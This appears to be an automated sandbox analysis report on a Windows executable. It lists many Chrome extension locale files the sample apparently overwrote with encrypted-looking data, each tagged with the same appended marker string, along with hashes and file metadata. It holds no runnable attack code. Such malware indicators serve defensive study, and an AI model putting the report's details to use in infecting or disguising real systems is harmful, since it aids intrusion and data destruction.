                                                                                                                                                                            Preview: ...M.Ue.8... K.Ml....I.w...xb5...y.Y.5.vX@l....Q*<n<Y..?f!7..;dxk.................KVO.=.....F.....<s..^.....i.......(.C[;}.#.iM.[..9&.1...}S..o(Zo.7.q...I.g..a..~..l....X..4..>0:.:LJ.A....A...P.{.e_.$..Z.}..9UI....'V0...u.v.....{...6O%.?. .....I..R...PP..w......03.y..@._.H.eM......(..Tm1.............6.i=<Mrg.........'....[>..<{h...}52.....C..42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMRAbhPRN2/oBah18ijZ6JB18JI6sM+c9PzgAeG0Icn3scii9a:TrhL8o0QiV6J38G6sfcS1rIE3sbD
                                                                                                                                                                            MD5:C03718BCE8E03D0D8DCD4D4DCA4C3743
                                                                                                                                                                            SHA1:5EF9F549F1FB92BA5DD487E2E7E0B6DF69FE7050
                                                                                                                                                                            SHA-256:5D0EB26C91B24103EF1E52206C71F81004FC923E95DFEBBD4352224658A00D5A
                                                                                                                                                                            SHA-512:3D32F611BE9699BF8437086A7A8B0DEB9D6CDF6E64C97C94FBD0B5A60D9BD7CAD464C8815E5F48BD89DF0A98B3AC5D51538E2EB960061CEB7D6306499262E0C9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .(..2LJ..]..T..TO....5..Yo..1<.....O@.5W.9...i...=...y<..P..I&U.=..L..Z(..i;....I...RM.;......S...<..l.....|#...Z...........!&..3......'B*..a....;....jV.K...VX.vW.'..G.......RA.g..=....*..6...$...)4Vk,...;M#3.=$....F.[........4...S8......;...1:...%..........._.F...#T.t#.g...*.....$..!E..d!....s...h.^sRX^4U.O..B<...&.... L.hRu.y...5./..[.....w.V..Q`...FFH.[..%.|P..B.#Y.7.Q...n.SPU;q.}.g..@-..........G....@.i.b=..42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:84wJ690xRt6Dg7EPWZAByaSrF+7mmKPYlBJfscn3scii9a:7wJ696Hcyrm/fsE3sbD
                                                                                                                                                                            MD5:C52B81AF5BC06841B177407A37C8778D
                                                                                                                                                                            SHA1:5E634415232353EDC9C16F13D6EAD5285D851A7E
                                                                                                                                                                            SHA-256:5AA8E88C07963CFD6BE004413A718DDB00F722B46C26BF69FAAADA18A6266DB9
                                                                                                                                                                            SHA-512:5D520CBFAC1BC7694E811F6E710C43A80B073FC606F2E14193F8588B516761C762CEE50BF4BFEEDB077BF8621CE8294DA0A9C4B508B0797035760B5869CB2576
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .....c.H....sP....z.7.z......H......Qo.8....]S.=.#bZ[-`.".).a..d...4..6r.N...x..Wt.}..$z........4..w.~.......{].6.....0c.D0~2...4JK...O.4.....z.P..[...`q..:e^C....I.?..w.3.......N...7.~...9.....#..R....<........!.a.-.&...[7....B..[...t..&..*.B....$..3......Cu..t....d.wXUB[...F.......^cT...F.\.}.`.p..|...[.'.=C'2'....n.=.~}Z|y|p.4t.).79<..%..4"x..d6.Nl..Fx...42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es_419\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:nmeSQ78Uxx03o/bwTTLbe+kV1NcR1Rq3cn3scii9a:meSSxC3o/mLbeZs43E3sbD
                                                                                                                                                                            MD5:8D924C04793489C108EC8AB032E38754
                                                                                                                                                                            SHA1:D545EE9E00BC3E060851E893F876CE81F2D424C8
                                                                                                                                                                            SHA-256:BBD2AC6F870564CF5BCADBC67351389ECE6A7D5E69FE093654BF5AC6CDD29C87
                                                                                                                                                                            SHA-512:86FC0C3B2C70D8F14E7F76F6050CDD96FEECF1E223707A1DE468BB4E63FE5006B0DCCC6FCBF7CB5D858B5A8F25A47ADE24E77390E1F70B600F2513FA0D198C65
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: y...0..6.T..k#-`.lj7.,..@....Cm;.4...Jv..).rg.R..6.z.....M...N...o...Jt..=o.ooz..^....O[..o.{.#.....P.|......P.$..,7...-........S....|..K......Z.=.q.4%n,...I.7p....N...8.S."T.d.*0],/h%.:3.~.G..R....BX1.1.{Y.<,..~.&.%.-.0...k...B..gI6..Q..C...q/...f."..B.Apns._.?..~A.Ub7.Q..Sc=U.........D.0u..........*X.....T.<..r..3.r.:.s]P.^.._....... wo......s...mw..<s4a408<.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:9FSg6vJhomKc1jRvslZEcaAFjWNT/sJwkWREo6C1eIyS9zcQjeF3scii96Z:9Fl6Rh3K0LcYDsJvWd1ryecn3scii9a
                                                                                                                                                                            MD5:41284AAC41D4D3D49C1F1FF8FC1517DB
                                                                                                                                                                            SHA1:6AF8A43D3A37B7108396F9B63D9AC7671C38C963
                                                                                                                                                                            SHA-256:9D5431A76E8AC43069CC555ACBE3125C5A178B400E6005E352609EC183BE9FD5
                                                                                                                                                                            SHA-512:27F652F91493D2256184633FBBE257859D9EF6719B0B2008B53FAAA386417420AEC4C99A7753DFD787322B498827C9387F86EE813CA84B4E3A8F857E9682C17A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ...;.x%........v.|.yc..(."..g..5..w#.D.-.......VL.....w.B.a....{.4..d.z(0lTO..3u.....W|..A...T.r."..).y..M..$..4k...'Bw..:WM.....U.^./R........IU{..80.2c8...wbcJ.:...t.......+.....uUN..e..|.FW..\.i..>..io]2..z...|....)...K...../.].ga..P,d....;.0....D...5.$..{.s..............G..DH....uz.. ..6{=..=y.O0...YmP....OC.)e...s....9.......i.A..p..-Q...p.t...:&....n.|..42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:Mvh1UCFImBSedJobbzSezdNX9+5zL/EN5rgxLcn3scii9a:MvhJFIqnJMnnPXEX/EDrgRE3sbD
                                                                                                                                                                            MD5:32B73FB63FF2124784715FF08F3E20D0
                                                                                                                                                                            SHA1:ADBB2F1AAA4693090A5762A486C8209F52F5903F
                                                                                                                                                                            SHA-256:D5DC0E97C4285A9261CAB60498DBDE0C1E3AF97B3832871EF4EB5440F064258F
                                                                                                                                                                            SHA-512:767CC7A2681476AA85BDC489B027DC8EE12429D4839EF3B717D1D2377DAD0594DDB012BAB4F01F89BC6177934768CF06B128A3233EEB0154B0C9DD2942A647DF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: z.....k...UF.4..d._0......l..d......r%.Q.&....f*?..m..ab.(Rj,.ao+.(.O..?K)...sq...N.%.......J.3.......{FtY]W.....s...c.O..}.........Zo.i.@....5.MY..N.{6w...T&Uu.sr....|+.M..|.{...k[#Mh.KY#.?.F<.b3q....."......e,......U.{k..l..."a...V.Y]=.Cl.E..j...z......N*.C.,...._&k....7Zx...`.....D.u:.w..y..r....O.~.9C...nEr..0....CT..T.P.y.....v...........F..`j..,.w.0....^42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:iLkaIjrNiWfDLupgzIMHuCh6NULq2D5igcn3scii9a:7aIlffDQgzIMHuCa9U8gE3sbD
                                                                                                                                                                            MD5:DBF503DD7AAAF73DAD5751C03761CD19
                                                                                                                                                                            SHA1:22832EF0940E5D8E61E687B6CACF7718DC19A102
                                                                                                                                                                            SHA-256:00A3958AA56AFBCC92FD1D2962DA51304B5B46C44DA35AF61B464130A8715A19
                                                                                                                                                                            SHA-512:2FDC61B783B72DCC9163D56CA9A6E6BFEA152AC4F60A94B97315DAE697183576CAF88DC29B2D23ADF0592DD0E1B1F675E5F198C42EC1390495A36F7AF5E9A41C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ...1.......-Km..z_.h.PRN.....~.1..8....X.D...*.....3.r..:.......5...>...1D.^J.aa~=..v?....(bh.I..4.u.j...-.D.@.e.cD4..#k&M....O."...j...?.."{...... ...Z)+.8}.~...7.?.lE.).*.I.Lu./_X|;.m $..j.....S6...fv.#.)..C....@..;7..(._v..w..F..Y.N..z..x../....-..i<2.h.mK...S...,\...1...&....X.O.%izD........N....f......A=...G...U >.#.....X@..c..3.......j...9t.v..U.p..b.0vv?.[....8Gq6).g.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:e9Y+zxzFqqEkgs5oXm1gr0SsO7jkxYB6Jcn3scii9a:e9TRwkgdXoZYn6JE3sbD
                                                                                                                                                                            MD5:E6A5E539C213D81A8B585F7C60DAE15B
                                                                                                                                                                            SHA1:D2213581C84662CFE6BA75B284B44766B22593D7
                                                                                                                                                                            SHA-256:CAAF2B8EE6E68863CAEC19F7AC0FF0C43B9980B6C98492A5AC55350CB62C3EF7
                                                                                                                                                                            SHA-512:FD443090A9CE21BD3226F5E402E3BBF9886CF54851C2B6B4D791547FCA0672A4A3644BE2AADC33C06B607AF2390FA10A809191956F5ACA7B13A2A1A0C32AE632
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ..G.A..X..stG.X.........T.E>wq.:Z/.PF-85..:...T.>?.@T@...k.0~..J..A6UF...d../$[..i..a]*7..S.....F.?n...>.C..W..6....yuF.C.Va...#..*w..3..*u.R=..J.H..=8V.4c.c..V..@......$/.8....i.L.%........ ...X.AU..9.....rD....j..`...^U.a......<6}......I.{..i..V7.SJ....0_j....B..6c........f.y.....,<..US.Qm3).;r0.....1S.l..\Y...1..:...^..X..+..#+d..lf^...]qQ.i.XK&....V_..A.L.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:4OcfY3cAE7tQSx4S3xJQ/uFOqR7gpD9ruS9Hx0Oy5cn3scii9a:4Ocf2E7tQS9heZqeJ9q0xo5E3sbD
                                                                                                                                                                            MD5:AF22F45EE38A6BD76A2EA9405B8EEBCB
                                                                                                                                                                            SHA1:0E0D03B1EDC59D0EAFE39B9FE70797767A7FEE84
                                                                                                                                                                            SHA-256:65FBDE61A8CDC1B0F00E94ECEAD199E9876F0FCD6DE2CB9EE3833B3D19E1C2BF
                                                                                                                                                                            SHA-512:03D82E1AAFFFB0FAADED46AC3147AD97ED12A401EE75D2F9EE8567041DBC96B0B1C9586BC401F68A7BEC93B653D14F021CE8840EEF1787BA066EE7A879B01445
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .L3..l.....3v...K..e]..R.}.2.w].!I...+...c....F.3.n.....@7../.C.?...mKlT....x^.b[8...|...e.......0.#..k=.f.^.5......u6.h.P.....'...$e.?...M...;=..9.:..6..".....bq.rBZj.x.a..........J.G|<.h.Cu.-..E..Y...>H.x..'..........bz.?`.}4...H.!t@,.&.g..).....u~..m5..V..+*?].f.........?.i.7..._mC.uZ.....7K.`.........b...v.|.1F.Q..I.....1..;..-.kN...w._.e;.......^t?.7.#. .85t..42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:LtnopZJExY02vZ+BuU1kfqw2DHT7gqTzFJYoHMncn3scii9a:xMZJ7VFbqrT7/6ocE3sbD
                                                                                                                                                                            MD5:A9AA1B248A14B97CDAFBBB8B4A8E9B98
                                                                                                                                                                            SHA1:044957CD05857A7671974D49981C2ABC93E66B02
                                                                                                                                                                            SHA-256:81B0C12DE62E7AEA2EAA78F8AD2D83A2102A344DCAF4FDEB2D13F4BF112755A6
                                                                                                                                                                            SHA-512:527FC5C47AAB6122B718AC538488F4FB7C47246DF73750F38E6AE7E7D3BDE20E9991BF9428964001519358790EB7360579B38E2E6252B7204779B4D19616B2B4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ..TIO.'...E.pU..7i..fN_R..u,...).s........3.i......... .6...../.#f.b..y..@lTa.R^{2(<....F...N...a[.-..g..s......PvQ.3.ls.9.TEt... .iH,G.IEa]a.......G...".....+..t..NQ..ec...].`.{....eu.+......E2)...a...N.S..:F..'.4_s.......G.V..V(j.8...a2~.!...L.A.4k|..<P...IH.%b....T........s.)....7 ^x." (.............{..yE=.z..B..[.QJN..W...4L)...>%.+......zM.?.=.. .U.J.Mmk...0.(z..%U............<..\Fv....ZX.h3.*..J..k].....Z...gT-..=od.=.5...3|v..zgC..z.5.r7f42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:AUOwLXgJjC5NYi8jfGQUmq1hsRagcn3scii9a:AUZX6O5NQ/km3E3sbD
                                                                                                                                                                            MD5:DFAB73B70E09471B5C5E539C5E6DAC4C
                                                                                                                                                                            SHA1:2EE1E952540BE5C2B661658ECD7ED85459F0A25A
                                                                                                                                                                            SHA-256:FA6C704FB2A90125C776E691B5AE0EEF5F4A56429FEF9F547027EF4623B94EE8
                                                                                                                                                                            SHA-512:D852D62198EF833157C703681FF67A12A1D4DD93D31DEC90C499D5DF4A71E237836DC0E54BD9A569486E124028810C9FA4DAF5DC352AE22FB105359B026B293C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ..I..%..S)/.m..o{.7.Xy.....INI.m...a\D..9.tnqi._e..%7...........uA.^ .....!Zt.eB.M..jf8.|..#..].....xeg6..].8...=f.mD*8.....V....C...`...}.......e.p.R.o.1=*.{..c.hC.......eX....JrQ.k..X......F."&...u..Q._a.)L...e..CT....)&.C.. ...x.7+r.K..'.....'.nh.^..b.......}9.c^..|...O.E..f.n.m.U..b..@6..sk=....h..".P#...*..Mg}.j{M...L.j.].SAjc...C...p.Z.|;#.R4...........&.....V.._o.0........B..42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:W5GGnuY2qeJDRCw0naugpwaZ5lCcn3scii9a:gp92qMLugVZ5wE3sbD
                                                                                                                                                                            MD5:D18E3878A0676C86772DDB549DC8DB6A
                                                                                                                                                                            SHA1:A1DCB6D6BEA91D9C41CD2D6A6F820F9A99702DD2
                                                                                                                                                                            SHA-256:7013B3F8C435B5965D2BC990E778A0C876B2D6B76DA9636CB2882743A98B74F4
                                                                                                                                                                            SHA-512:17599DDE0F17771F095B972FDEC5E33B688EFB1E50438604F66C36E5EACD38A6F6479EBE322BB2F1245387C72099E80CF74054C6016771FF7E456A916B33CAC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .9f):.60+g..>4X......=.......F..x2.R..W6...<...p^.s.%8.tP5...geD.......iA.d\5.Q.ig\wL(U.>..8....R@!....*...,^[......6.J.}.t..i.n..%?..H.yQ.iN\...[zY....b.4....wc.......R#..3...~.d.[...X.0.... .C+.s....=.y.........n6.U....i.....,...W.[!~.o...K.*.|...1Si.....9.8...L+.O...E.pnC..Edw..6\..4..$.+.3.y.p3Kg..w..!......c...p}..{f.....G..J........S-!q.[...........42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:nDPGJnW8Mej/iGxC416FvY8YM2R0NtRhjDSimu8UdTmOGcvdRkcn3scii9a:nDJ8MK/lv16xIM00b3JZd0c1uE3sbD
                                                                                                                                                                            MD5:38BCF8E4AEA9969AAD1B7FC83121F5C1
                                                                                                                                                                            SHA1:68DE292A8BF19FB6CBEA35ECDC1818BC78E4C0DB
                                                                                                                                                                            SHA-256:9FF27F4B5D0BF6885970A0460AE8D3EEED7AEF965B19B8FF0BFBE89E3AC48224
                                                                                                                                                                            SHA-512:21C7A6339D4AF7CCB2E38D0082CDAD2A952D2432E4337E65CD20F6EC3268AE4B1D0A4F8A3AAA027D3EE8519080E4AE02A2B15EE26B2021BB85BB7BD1528E6B6C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .......`..... Q....B....Fg....)......JI..j..{.G.<&..)..KE.9....B..j..P6f;.{'`.oh-.....c.0...D.S>.@.)3..B..d....s...VY..Oun><.....`h#W..k.....R..:......ei...}h...3...M....t.O.~ I.5W.e.O5=..v.h?....D,..v.8-.D.A..oiUZ.M...pz.....1.C.Y.}>.A.`..!...;Q..H.....c2..-.W..u[.l.nv.....Y...O...?.YS...`L.1a-o..Z..F......8H....)r.+FXCd9.......e.....6I.....V..C.!.gU.O^..P|.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:zUe0GuwtHJoQSO9ppW5PEQXQHgocTrm7xTCfacn3scii9a:zUe0MH79pUerHsXGJE3sbD
                                                                                                                                                                            MD5:A9F25B18988586DD0E19F0C9A1A0B38F
                                                                                                                                                                            SHA1:3FD75A523A8C36DD0B25C3E34CECEBB75360BA39
                                                                                                                                                                            SHA-256:D6D6D2DEF2B78FC282201647854635E6029EC5B26A64D4155378655E400CCE2F
                                                                                                                                                                            SHA-512:BE2FA033DEC5D502B2EC743253ADC5AD7B8AE3216D1ABD158AF43ACF8743B7178541E0C330C75E6E373BCAC061AFF678EF641B878AF4793A1172FBDE022FB1D5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ...!...W..;XK.....b%/u.g8i..F..FJ..v.l..UE.1...i..?.....]\...?j.).....Q..s.(.7g.j.#K4...|..^.HXC..kL#>..2.......Z.o.Yl....nq...Mh..~.l6,.o.'0Rq..L.....8IOl...c3..+m..l.9a..]]{S.7jZ...?#.<.1...C..H..8...l..Fp.*..#c..\....@G2j...d.G......9N....8qR....C1..b8_...5.....&|.FO.w..1.].y>..z...Lm,...3......R_h...$W$_....E...-...V..8.).r....!.....Qq2.:x.I....e.e.....%.Np.s..E.A.....r.q.B.B4.:.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:wCLnRzTHOGweBRRhOABq0qfjCjL38MW/s/uUcn3scii9a:NLxTuheBBvBb8S+E//E3sbD
                                                                                                                                                                            MD5:6494BB19BD8B23715D11803A08BF6392
                                                                                                                                                                            SHA1:9FD9827457C22478B0B20141F82E71E7688F4ECC
                                                                                                                                                                            SHA-256:CCB638EA0F3A3EC92138CA9F930DBF98A54AE4F33F0EAFBF8380831744C8DC27
                                                                                                                                                                            SHA-512:7D8B327D4FA6B94E64743BDF956E22FA3773A2CFF28CBE1FA92BD74ECA2D17998945F7BEF9C3FE296D22664B88A79662B4A52FB644A2724CABD41AC4CEB5116E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ..B.....{....T...7Z.G\z..:B.Z.s4lD.k..<.N....*.?q.L.3.I[3I....7.8b.t.7...Y.7XWD6..%.,.66.|.z)*..y.0L....b.i......'M9....BL=f^B/.......`w.>.. .FG...i............&%.R%<.J..[7.P....]..&.M ... .....8.....@..V."...[...X.O.$.........7.g..).>.f&......'.6NB,tE`..#G...u...q/'3.C.P..>>.....%2KA.$...>.?...M>"[.'.\ut\$....b.....f<.3.F.......!R.m..V.oF..........(....42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\messages.json
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:48Y2N7xNrcgpehdnPbjS4auP/bf1n7Defa0cn3scii9a:4H2NdRcgpmnjjOGTf1+a0E3sbD
                                                                                                                                                                            MD5:9D648B9895470B79740713718096684A
                                                                                                                                                                            SHA1:E36D9E6D7BDD856A8B1C8B574636A0FF862DD1DE
                                                                                                                                                                            SHA-256:E499BF5DE7DDC193F6BDD82280C1AEBC9A7C04AE8CAA2D52239B00C2634152EC
                                                                                                                                                                            SHA-512:4F133EBAF19CE009C20DFE1AE603218635AED75D726CB42F5E5DECC51232245A8F8F62C84F81E05088AEB5E8BC95CEB93A3645032682A24D327C60E5CBEBF89C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: GQ..o.#}..O.:o9..!.IX..9....Iz..Q.c..>.&!wK....R.RJ@'........m......G_..:......RGco..:O......*.....a..j...ex?.........L.f.+...4..}...*......~.....0..{.RL.....d...9.k..^O.a..B...z...O*.(.......=.2K@N.5.....v.w`f...^..O.T......-EBr..........1.vff.......l...]..Z.XN..-.qA.|.2..~?x.c.'!pX.B.m..I,.....mQ..)G8iW...,...D3jB...(8G(..N...b..9,5.B4.B:...t:...2.JL..{......<w.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.827235060210533
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                            • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • VXD Driver (31/22) 0.00%
                                                                                                                                                                            File name:TpZ10Hfjov.exe
                                                                                                                                                                            File size:743424
                                                                                                                                                                            MD5:11f5960ea7de49e5b29a775e3a0f1782
                                                                                                                                                                            SHA1:1d742c7bd0584d27225b7cd6fd1f423ac831b43f
                                                                                                                                                                            SHA256:44f6676314c6c50f2807f34a33335abd58ca254f95c213496205825257f7b4d6
                                                                                                                                                                            SHA512:ce6c13020dfb2cbb23edbff4779b1ddbf15ed4299461b3086f85f87953bad93cfc3a0a719b3f061a60cdb816a1c1b6d7fd4d88a155bc8e1839b4ab36c3aea53d
                                                                                                                                                                            SSDEEP:12288:RTeEXmlfT1smQrgCitHkcWGamM2Aut4og/wOrLhTotRArS3elESsg3CMhaqrwMrC:RTeEXmlfT1smQnGTFcItlsmerRESR3CU
